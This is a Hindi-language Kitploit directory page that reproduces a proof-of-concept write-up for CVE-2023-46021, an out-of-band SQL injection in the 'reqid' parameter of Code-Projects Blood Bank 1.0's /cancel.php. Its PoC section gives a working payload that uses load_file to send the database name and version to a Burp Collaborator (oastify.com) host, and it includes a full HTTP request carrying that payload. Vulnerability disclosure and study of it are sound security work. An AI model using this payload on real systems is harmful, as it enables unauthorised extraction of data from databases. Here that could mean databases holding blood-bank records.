Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability | Kitploit
उपकरण/GitHubGitHub/ersinerenler/cve-2023-46021-code-projects-blood-bank-1.0-sql-injection-vulnerability
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubersinerenler/cve-2023-46021-code-projects-blood-bank-1.0-sql-injection-vulnerability

CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
2 साल पहलेअभी तक समीक्षित नहीं

CVE-2023-46021-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability

  • एक्सप्लॉइट लेखक: ersinerenler

विक्रेता होमपेज

  • https://code-projects.org/blood-bank-in-php-with-source-code

सॉफ़्टवेयर लिंक

  • https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip

अवलोकन

  • कोड-प्रोजेक्ट्स ब्लड बैंक V1.0, /cancel.php फ़ाइल में 'reqid' पैरामीटर के माध्यम से आउट-ऑफ-बैंड (OOB) SQL इंजेक्शन से संबंधित एक गंभीर सुरक्षा भेद्यता के संपर्क में है। यह भेद्यता उचित सुरक्षा तंत्रों की कमी के कारण उत्पन्न होती है, जिससे हमलावर पैरामीटर का दुरुपयोग कर सकते हैं और बर्प कोलैबोरेटर के माध्यम से OOB SQL इंजेक्शन हमले कर सकते हैं। इसके परिणामस्वरूप डेटाबेस से संवेदनशील जानकारी तक अनधिकृत पहुंच और उसका निष्कर्षण हो सकता है।

भेद्यता विवरण

  • CVE ID: CVE-2023-46021
  • प्रभावित संस्करण: ब्लड बैंक V1.0
  • भेद्य फ़ाइल: /cancel.php
  • पैरामीटर नाम: reqid
  • हमले का प्रकार: स्थानीय

संदर्भ:

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46021
  • https://nvd.nist.gov/vuln/detail/CVE-2023-46021

विवरण

  • कोड-प्रोजेक्ट्स ब्लड बैंक V1.0 के /cancel.php फ़ाइल में 'reqid' पैरामीटर आउट-ऑफ-बैंड SQL इंजेक्शन के प्रति संवेदनशील है। यह भेद्यता अपर्याप्त सुरक्षा तंत्रों के कारण उत्पन्न होती है, जो हमलावरों को OOB SQL इंजेक्शन हमले शुरू करने के लिए बर्प कोलैबोरेटर का उपयोग करके पैरामीटर का शोषण करने की अनुमति देती है। इस तकनीक के माध्यम से, एक हमलावर डेटाबेस से संवेदनशील जानकारी निकाल सकता है।

प्रमाण की अवधारणा (PoC) :

  • बर्प सुइट के माध्यम से cancel.php का अनुरोध इंटरसेप्ट करें
  • भेद्य पैरामीटरों में पेलोड इंजेक्ट करें
  • पेलोड: 4'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.collaborator-domain\\a.txt')))%2b+'
  • reqid पैरामीटर के लिए उदाहरण अनुरोध
root@kitploit:~
---
GET /bloodbank/file/cancel.php?reqid=4'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.7mus27hip62tznk3gy4n7z3fo6uxin6c.oastify.com\\a.txt')))%2b' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://localhost/bloodbank/sentrequest.php?msg=You%20have%20requested%20for%20blood%20group%20A+.%20Our%20team%20will%20contact%20you%20soon.
Cookie: PHPSESSID=<some-cookie-value>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
---
  • डेटाबेस और संस्करण जानकारी बर्प सुइट कोलैबोरेटर के माध्यम से प्राप्त की गई
image
टूल डाउनलोड करें